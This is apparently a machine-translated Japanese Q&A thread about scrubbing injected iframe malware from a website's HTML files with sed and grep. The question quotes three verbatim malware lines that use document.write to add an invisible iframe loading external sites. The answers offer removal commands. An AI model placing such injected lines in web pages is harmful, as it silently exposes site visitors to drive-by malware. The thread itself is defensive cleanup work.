linux - iframeマルウェアのクリーンアップ

Question

私は誰かがサイトのマルウェア感染をクリーンアップするのを手伝っていますが、sedの一部の文字列を正しく照合するのに苦労しているので、大量検索して置換/削除するスクリプトを作成できます。

文字列は次のとおりです。

<script>document.write('<style>.vb_style_forum {filter: alpha(opacity=0);opacity: 0.0;width: 200px;height: 150px;}</style><div class="vb_style_forum"><iframe height="150" width="200" src="http://www.iws-leipzig.de/contacts.php"></iframe></div>');</script>

<script>document.write('<style>.vb_style_forum {filter: alpha(opacity=0);opacity: 0.0;width: 200px;height: 150px;}</style><div class="vb_style_forum"><iframe height="150" width="200" src="http://vidintex.com/includes/class.pop.php"></iframe></div>');</script>

<script>document.write('<style>.vb_style_forum {filter: alpha(opacity=0);opacity: 0.0;width: 200px;height: 150px;}</style><div class="vb_style_forum"><iframe height="150" width="200" src="http://www.iws-leipzig.de/contacts.php"></iframe></div>');</script>

それらの行のさまざまな文字をエスケープする方法がわからないようです...

行全体が一致する場合は削除すると言うと、ファイル内http://vidintex.com/includes/class.pop.phpの終了HTMLも削除されます。</body>.html

したがって、sedでこの行全体を一致させることができる必要があります。

    <script>document.write('<style>.vb_style_forum {filter: alpha(opacity=0);opacity: 0.0;width: 200px;height: 150px;}</style><div class="vb_style_forum"><iframe height="150" width="200" src="http://www.iws-leipzig.de/contacts.php"></iframe></div>');</script>

どんな助けでも大歓迎です！

Answer 1

あなたはこれをやってみることができます：

sed -i '/vidintex.com\/includes\/class.pop.php/d' files*

これにより、vidintex.com / include/class.pop.phpを含むすべての行が削除されます

Answer 2

sourceforgeでSMScannerの使用を開始できます。それはあなたの問題を即座に解決します

Answer 3

Linuxサーバーからiframeマルウェアを削除するスクリプトを探すのと同様にscript、最後のタグの横にあるタグを探して、それをタグbodyだけに置き換えることができますbody。このスクリプトは、影響を受けるすべてのファイルを検索し、最後のスクリプトを削除します。

最後にスクリプトが含まれる本物のファイルが見つかる可能性があるため、最初にファイルのgrepが感染したファイルのみを検出することを確認してください。

# grep recursively for text
# escape all spaces in file names
# global search and replace with just body tag
grep -Rl "</script></body>" * | sed 's/ /\ /g' | xargs sed -i 's/<script .*><\/script><\/body>/<\/body>/g'